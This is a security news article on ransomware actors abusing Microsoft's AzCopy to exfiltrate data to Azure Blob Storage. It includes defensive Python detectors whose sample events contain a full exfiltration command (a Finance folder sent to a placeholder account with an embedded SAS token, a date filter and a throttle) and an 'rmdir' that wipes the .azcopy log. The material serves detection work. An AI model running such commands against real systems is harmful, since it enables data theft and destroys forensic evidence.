Trusted Azure Utility AzCopy Turned into Data Exfiltration Tool in Active Ransomware Campaigns

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

The cybersecurity landscape has taken a sharp and dangerous turn. Ransomware operators, long associated with using suspicious tools to steal data, have begun turning to the same software IT teams rely on every day.

Microsoft’s AzCopy, a legitimate command-line utility built for moving data to and from Azure Storage, has become the latest tool of choice for attackers quietly draining sensitive files from organizations before triggering encryption.

This shift reflects how modern ransomware groups now operate — blending in, staying silent, and using trusted technology against the very organizations it was built to support.

AzCopy was built to simplify large-scale cloud data operations for enterprise environments. It runs as a standalone executable, requires no installation, and transfers data over standard HTTPS connections directly to Microsoft’s Azure infrastructure.

Since it is a recognized and widely used tool in real business operations, most Endpoint Detection and Response (EDR) platforms do not flag its activity as suspicious.

For ransomware operators, this creates ideal cover. By routing stolen data through a trusted utility toward a legitimate cloud provider over normal network channels, attackers can move sensitive files out of a target environment with very little chance of detection.

Varonis Threat Labs researchers identified multiple incidents where AzCopy was used directly as a data exfiltration tool, and in at least one confirmed case, the operation went undetected by the victim organization’s EDR platform.

This points to a deliberate shift in how ransomware operators approach the final and most critical stage of an attack.

Rather than routing stolen data to bulletproof hosting providers — which face growing law enforcement pressure, as demonstrated by the disruption of LockBit’s infrastructure — threat actors now push data into Azure Blob Storage accounts set up in minutes using a credit card or compromised credentials.

The impact of this tactic runs deep. Double extortion ransomware attacks follow a two-stage pattern: attackers first steal sensitive data, then encrypt the organization’s systems, and threaten to publicly release stolen files unless a ransom is paid.

When stolen data moves through Microsoft’s global infrastructure, it looks identical to normal business traffic. Security teams monitoring outbound Azure connections have no built-in reason to flag the activity as harmful.

By the time exfiltration is confirmed and a takedown request is filed, the data has typically been copied elsewhere and eventually surfaces on the attacker’s public leak site.

How Attackers Weaponize AzCopy for Silent Data Theft

Before executing any file transfer, threat actors generate a Shared Access Signature (SAS) token — a self-contained authentication URL granting access to an attacker-controlled Azure Storage account without requiring a username or password.

This token is embedded directly inside the AzCopy command and carries built-in permissions along with start and expiry timestamps.

In investigated cases, the token was active for only three days and eight hours, keeping the exposure window narrow while allowing enough time to complete the full data transfer.

SAS Token (Source – Varonis): Self-contained authentication URL with embedded permissions and expiry timestamps used by threat actors to access attacker-controlled Azure storage.

The AzCopy command is carefully customized for precision. The --include-after parameter limits transfers to files modified after a specific date, targeting only recent and relevant data.

The --cap-mbps parameter throttles upload speed, making outbound traffic appear steady and consistent rather than triggering spike-based network detection thresholds.

Together, these parameters allow an attacker to extract targeted files quietly, mimicking routine cloud synchronization activity across the network.

AzCopy Command Line (Source – Varonis): Customized AzCopy command targeting financial files with date-filter and speed-throttle parameters designed to evade detection.

By default, AzCopy writes a log file to a hidden directory called .azcopy inside the executing user’s profile, recording every file successfully transferred. This log carries significant forensic value for investigators.

However, in recently investigated cases, attackers deleted this entire directory immediately after completing exfiltration, deliberately wiping the evidence trail of exactly what had been stolen.
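The three endpoint-side indicators described above (a SAS token embedded in the AzCopy command line, the --include-after and --cap-mbps parameters, and deletion of the .azcopy log directory) can be pulled out of ordinary process-creation telemetry. The following is an added detection example written for this article; it is not code from Varonis or from the original post. The sample events, hostnames, user names, storage account name and SAS values are constructed for the example (the signature is a literal placeholder), and the set of "approved hosts" is an assumption standing in for an organization's own allow-list of systems permitted to run AzCopy.

```python
import re
from datetime import datetime
from urllib.parse import urlparse, parse_qs

# Constructed process-creation events (shape loosely modelled on Sysmon Event ID 1 /
# Windows 4688 fields). Hosts, users, paths, the storage account name and the SAS
# values are all invented for this example; "PLACEHOLDERSIGNATURE" stands in for the
# signature a real token carries.
SAMPLE_EVENTS = [
    {"ts": "2024-03-01T02:14:07Z", "host": "FIN-WS12", "user": "CORP\\svc-backup",
     "image": "C:\\Users\\Public\\azcopy.exe",
     "cmdline": ('azcopy.exe copy "C:\\Finance\\Reports" '
                 '"https://placeholderacct.blob.core.windows.net/dump'
                 '?sv=2022-11-02&st=2024-03-01T00:00:00Z&se=2024-03-04T08:00:00Z'
                 '&sp=rwl&sig=PLACEHOLDERSIGNATURE" '
                 '--recursive --include-after "2024-01-01" --cap-mbps 20')},
    {"ts": "2024-03-01T02:15:30Z", "host": "FIN-WS12", "user": "CORP\\svc-backup",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": 'cmd.exe /c rmdir /s /q "C:\\Users\\svc-backup\\.azcopy"'},
    {"ts": "2024-03-01T09:00:00Z", "host": "BACKUP01", "user": "CORP\\svc-azbackup",
     "image": "C:\\Program Files\\AzCopy\\azcopy.exe",
     "cmdline": ('azcopy.exe sync "D:\\Backups" '
                 '"https://corpbackup.blob.core.windows.net/backups" --recursive')},
]

BLOB_URL_RE = re.compile(r'https://[^\s"\']+\.blob\.core\.windows\.net[^\s"\']*', re.I)
INCLUDE_AFTER_RE = re.compile(r'--include-after[=\s]+"?([^"\s]+)', re.I)
CAP_MBPS_RE = re.compile(r'--cap-mbps[=\s]+(\d+(?:\.\d+)?)', re.I)
DELETE_VERB_RE = re.compile(r'(rmdir|\brd\b|\bdel\b|remove-item|\brm\b)', re.I)


def _parse_sas_time(value):
    """SAS st/se values are ISO 8601 UTC timestamps, e.g. 2024-03-01T00:00:00Z."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def inspect_azcopy_command(cmdline):
    """Extract the indicators the article describes from one AzCopy command line."""
    info = {"blob_host": None, "sas": False, "sas_permissions": None,
            "sas_window_hours": None, "include_after": None, "cap_mbps": None}
    m = BLOB_URL_RE.search(cmdline)
    if m:
        url = urlparse(m.group(0))
        info["blob_host"] = url.hostname
        q = parse_qs(url.query)
        if "sig" in q:  # a signature query parameter means a SAS token is embedded
            info["sas"] = True
            info["sas_permissions"] = q.get("sp", [None])[0]
            if "st" in q and "se" in q:
                delta = _parse_sas_time(q["se"][0]) - _parse_sas_time(q["st"][0])
                info["sas_window_hours"] = delta.total_seconds() / 3600
    m = INCLUDE_AFTER_RE.search(cmdline)
    if m:
        info["include_after"] = m.group(1)
    m = CAP_MBPS_RE.search(cmdline)
    if m:
        info["cap_mbps"] = float(m.group(1))
    return info


def analyze_events(events, approved_hosts):
    """Return findings for AzCopy runs and for deletions of the .azcopy log directory."""
    findings = []
    for ev in events:
        cmd = ev["cmdline"]
        if ev["image"].lower().endswith("azcopy.exe"):
            info = inspect_azcopy_command(cmd)
            reasons = []
            if ev["host"] not in approved_hosts:
                reasons.append("azcopy executed on a host not approved for Azure Storage transfers")
            if info["sas"]:
                reasons.append("SAS token embedded in command line "
                               f"(sp={info['sas_permissions']}, window={info['sas_window_hours']}h)")
            if info["include_after"]:
                reasons.append(f"--include-after date filter present: {info['include_after']}")
            if info["cap_mbps"] is not None:
                reasons.append(f"--cap-mbps throttle present: {info['cap_mbps']} Mbps")
            if reasons:
                findings.append({"kind": "azcopy_transfer", "host": ev["host"], "user": ev["user"],
                                 "ts": ev["ts"], "severity": "high" if len(reasons) >= 3 else "medium",
                                 "reasons": reasons, "details": info})
        elif ".azcopy" in cmd.lower() and DELETE_VERB_RE.search(cmd):
            # Deleting the log directory removes the only local record of what was copied.
            findings.append({"kind": "azcopy_log_deletion", "host": ev["host"], "user": ev["user"],
                             "ts": ev["ts"], "severity": "high",
                             "reasons": ["deletion of the .azcopy log directory (anti-forensics)"],
                             "details": {"cmdline": cmd}})
    return findings


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS, approved_hosts={"BACKUP01"}):
        print(f["ts"], f["host"], f["kind"], f["severity"], "; ".join(f["reasons"]))
```

Run on the constructed events, the first record is rated high (non-approved host, embedded SAS with an 80-hour validity window, date filter and throttle all present), the rmdir of .azcopy is flagged separately, and the scheduled backup job on the approved host produces nothing. The SAS start/expiry parsing is the most useful piece: because the signature is computed over the whole SAS, the command line has to carry the validity window in clear, so a SOC can read how long the attacker expected the transfer to take.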

Log entries capturing successfully exfiltrated files, serving as a key forensic artifact during incident investigation.

Threat actors removing the .azcopy log directory post-exfiltration to eliminate forensic evidence from the compromised system.

Organizations should monitor outbound connections to *.blob.core.windows.net from systems that do not normally interact with Azure storage.

User and Entity Behavior Analytics (UEBA) can flag unusual file access patterns on service accounts outside established behavior baselines. Application whitelisting should restrict AzCopy execution to only approved systems and accounts.
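The network-side recommendation above (watch for *.blob.core.windows.net traffic from systems that do not normally use Azure Storage) amounts to a baseline-and-deviation check. The following added example, again not code from Varonis or the original post, builds that baseline from a constructed outbound proxy log and flags two kinds of deviation: a host that has never talked to Blob Storage before, and a known host talking to a storage account it has never used. The log format, hostnames, storage account names, byte counts and the cutoff date are all constructed; a real deployment would feed it proxy, firewall or DNS records and a baseline window of weeks rather than the handful of lines here.

```python
from collections import defaultdict
from datetime import datetime

BLOB_SUFFIX = ".blob.core.windows.net"

# Constructed outbound proxy log: "<timestamp> <source host> <destination host> <bytes out>".
# Hostnames, storage account names and byte counts are invented for this example.
SAMPLE_PROXY_LOG = """\
2024-02-20T10:00:00Z BACKUP01 corpbackup.blob.core.windows.net 524288000
2024-02-21T10:00:00Z BACKUP01 corpbackup.blob.core.windows.net 498000000
2024-02-22T10:05:00Z DEV-WS03 login.microsoftonline.com 12000
2024-03-01T02:14:30Z FIN-WS12 placeholderacct.blob.core.windows.net 2147483648
2024-03-01T02:20:00Z FIN-WS12 placeholderacct.blob.core.windows.net 2147483648
2024-03-01T09:00:00Z BACKUP01 corpbackup.blob.core.windows.net 510000000
"""

# Assumed boundary between the learning period and the period under investigation.
DETECTION_CUTOFF = "2024-03-01T00:00:00Z"


def _ts(value):
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def parse_proxy_log(text):
    """Parse the constructed four-column log into records with typed fields."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, sent = line.split()
        records.append({"ts": _ts(ts), "src": src, "dst": dst.lower(), "bytes_out": int(sent)})
    return records


def build_blob_baseline(records, cutoff):
    """Map each host to the set of storage accounts it contacted before the cutoff."""
    cutoff = _ts(cutoff)
    baseline = defaultdict(set)
    for r in records:
        if r["ts"] < cutoff and r["dst"].endswith(BLOB_SUFFIX):
            baseline[r["src"]].add(r["dst"])
    return dict(baseline)


def detect_new_blob_talkers(records, baseline, cutoff):
    """Flag post-cutoff Blob Storage traffic from an unknown host or to an unknown account."""
    cutoff = _ts(cutoff)
    agg = {}
    for r in records:
        if r["ts"] < cutoff or not r["dst"].endswith(BLOB_SUFFIX):
            continue
        if r["dst"] in baseline.get(r["src"], set()):
            continue  # host is already known to exchange data with this account
        entry = agg.setdefault(r["src"], {"host": r["src"], "accounts": set(),
                                          "bytes_out": 0, "first_seen": r["ts"]})
        entry["accounts"].add(r["dst"])
        entry["bytes_out"] += r["bytes_out"]
        entry["first_seen"] = min(entry["first_seen"], r["ts"])
        entry["reason"] = ("host never seen contacting Azure Blob Storage"
                           if r["src"] not in baseline
                           else "known host, previously unseen storage account")
    # Largest outbound volume first: exfiltration is usually the biggest new flow.
    return sorted(agg.values(), key=lambda e: e["bytes_out"], reverse=True)


def run_sample():
    records = parse_proxy_log(SAMPLE_PROXY_LOG)
    baseline = build_blob_baseline(records, DETECTION_CUTOFF)
    return detect_new_blob_talkers(records, baseline, DETECTION_CUTOFF)


if __name__ == "__main__":
    for f in run_sample():
        print(f["host"], f["reason"], sorted(f["accounts"]),
              f"{f['bytes_out'] / 2**30:.1f} GiB since {f['first_seen'].isoformat()}")
```

The per-host set of known storage accounts is what makes this more than an allow-list: the backup server in the sample is a legitimate AzCopy user, but if it started pushing data to an account that is not its own, that would still surface. A --cap-mbps throttle defeats spike thresholds, so the aggregate byte count over the window, not any single connection, is the value worth alerting on.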

Incident response plans must be documented and tested in advance, particularly for major containment decisions such as severing internet access during a live ransomware incident.
